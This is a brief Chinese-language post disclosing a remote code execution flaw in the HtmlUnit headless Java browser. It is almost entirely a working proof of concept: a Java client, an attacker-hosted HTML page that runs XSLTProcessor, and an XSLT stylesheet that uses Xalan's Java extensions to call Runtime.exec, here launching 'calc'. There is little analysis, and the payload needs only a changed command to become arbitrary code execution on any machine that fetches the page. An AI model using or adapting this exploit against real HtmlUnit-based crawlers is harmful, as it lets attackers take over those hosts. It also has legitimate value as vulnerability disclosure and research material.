HtmlUnit 适用于java的无头浏览器，我其实觉得不算无头浏览器吧更像爬虫，最新版本也可以做到浏览攻击者网页触发RCE

先简单放个图，后面来补

其实真的蛮简单的就不分析了，我那天只是偶尔看了下就找到了，不过最近xslt好像比较火来着呢

Test.java

package HtmlUnit;

import com.gargoylesoftware.htmlunit.WebClient;
import com.gargoylesoftware.htmlunit.html.HtmlPage;

public class Test {

    public static void main(String[] args) throws Exception {

        try (final WebClient webClient = new WebClient()) {
            // no you have a running browser and you can start doing real things
            // like going to a web page

            final HtmlPage page = webClient.getPage("http://xxx/htmlunit.html");
        }
    }
}

htmlunit.html

<script>
    function createXmlDocument() {
        return document.implementation.createDocument('', '', null);
    }
    function  loadXMLDocumentFromFile(file) {
        xhttp = new XMLHttpRequest();
        xhttp.open("GET", file, false);
        xhttp.send();
        return xhttp.responseXML;
    }
    console.log("1");

    var xmlDoc = createXmlDocument();
    xmlDoc.async = false;
    xmlDoc = loadXMLDocumentFromFile("1.xml");
    

    var xslDoc = createXmlDocument();
    xslDoc.async = false;
    xslDoc = loadXMLDocumentFromFile("2.xml");

    var processor = new XSLTProcessor();
    processor.importStylesheet(xslDoc);
    processor.transformToDocument(xmlDoc);
</script>

1.xml

<?xml version="1.0" encoding="UTF-8"?>
<s></s>

2.xml

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
   <xsl:template match="/">
     <xsl:variable name="rtobject" select="rt:getRuntime()"/>
     <xsl:variable name="process" select="rt:exec($rtobject,'calc')"/>
     <xsl:variable name="processString" select="ob:toString($process)"/>
     <xsl:value-of select="$processString"/>
   </xsl:template>
 </xsl:stylesheet>